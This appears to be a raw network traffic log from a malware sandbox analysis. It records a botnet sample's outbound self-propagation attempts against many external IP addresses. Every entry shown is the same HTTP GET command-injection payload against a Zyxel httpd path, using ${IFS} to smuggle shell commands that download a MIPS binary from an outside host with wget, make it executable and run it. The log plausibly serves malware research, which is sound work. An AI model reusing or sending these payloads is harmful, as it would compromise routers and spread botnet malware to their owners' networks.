                                                  Jan 19, 2024 18:24:10.347769976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7910192.168.2.135050891.153.1.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.347804070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7911192.168.2.133627424.36.201.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.347855091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7912192.168.2.1333440150.151.217.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.347901106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7913192.168.2.1340664106.31.235.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.347943068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7914192.168.2.1358754147.195.31.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.347961903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7915192.168.2.134988072.6.194.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.348010063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7916192.168.2.1343000119.10.169.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.348048925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7917192.168.2.1355546140.170.171.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.348118067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7918192.168.2.1348300148.220.38.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.348148108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7919192.168.2.1357506181.132.101.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.348181963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7920192.168.2.1347404198.134.46.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.348217964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7921192.168.2.1333590173.214.4.91443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.348258018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7922192.168.2.133484863.241.238.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.348303080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7923192.168.2.134283234.191.199.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.348341942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7924192.168.2.134094638.228.90.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.348380089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7925192.168.2.133927845.13.142.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.348432064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7926192.168.2.1337692144.176.150.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.348469019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7927192.168.2.1349412173.221.2.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.348506927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7928192.168.2.1360862172.177.231.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.348553896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7929192.168.2.1334950136.124.65.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.348609924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7930192.168.2.1336886137.114.161.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.348635912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7931192.168.2.1354794116.6.244.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.348659992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7932192.168.2.135452099.34.153.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.348691940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7933192.168.2.133352212.132.157.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.348751068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7934192.168.2.133319673.211.171.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.348778963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7935192.168.2.1352978206.156.215.77443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.348812103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7936192.168.2.1357350176.136.35.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.348872900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7937192.168.2.135679254.140.211.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.348901987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7938192.168.2.1358880106.96.37.107443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.348953962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7939192.168.2.135214877.137.224.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.348994017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7940192.168.2.135618657.44.167.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.349030972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7941192.168.2.134403885.49.40.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.349067926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7942192.168.2.135244285.217.236.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.349112034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7943192.168.2.1334986166.251.13.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.349148035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7944192.168.2.134949236.100.171.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.349205017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7945192.168.2.133899471.229.25.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.349244118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7946192.168.2.135296031.129.17.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.349292994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7947192.168.2.1352712133.87.205.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.349315882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7948192.168.2.135564893.33.9.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.349375963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7949192.168.2.134549073.128.207.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.349410057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7950192.168.2.1354568147.4.126.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.349452019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7951192.168.2.135215881.138.200.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.349503994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7952192.168.2.1343336153.242.247.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.349519968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7953192.168.2.1339514189.67.114.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.349554062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7954192.168.2.1350896168.171.212.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.349582911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7955192.168.2.1356920161.196.67.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.349630117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7956192.168.2.1337874150.177.90.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.349664927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7957192.168.2.134414438.199.139.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.349697113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7958192.168.2.1351764177.74.34.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.349720001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7959192.168.2.1345630165.27.242.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.349760056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7960192.168.2.13407482.186.105.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.349812984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7961192.168.2.1356802130.243.37.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.349838018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7962192.168.2.1357174194.37.51.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.349884033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7963192.168.2.1358886108.214.43.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.349927902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7964192.168.2.1342368113.40.38.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.349970102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7965192.168.2.1344504148.221.108.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.350008965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7966192.168.2.1342416145.202.74.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.350033998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7967192.168.2.1357460143.120.32.157443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.350081921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7968192.168.2.133550487.236.68.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.350123882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7969192.168.2.135290812.33.154.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.350153923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7970192.168.2.134107452.26.17.2443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.350212097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7971192.168.2.133845064.178.139.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:10.350241899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7972192.168.2.133558259.195.185.103443
                                                  TimestampBytes transferredDirectionData
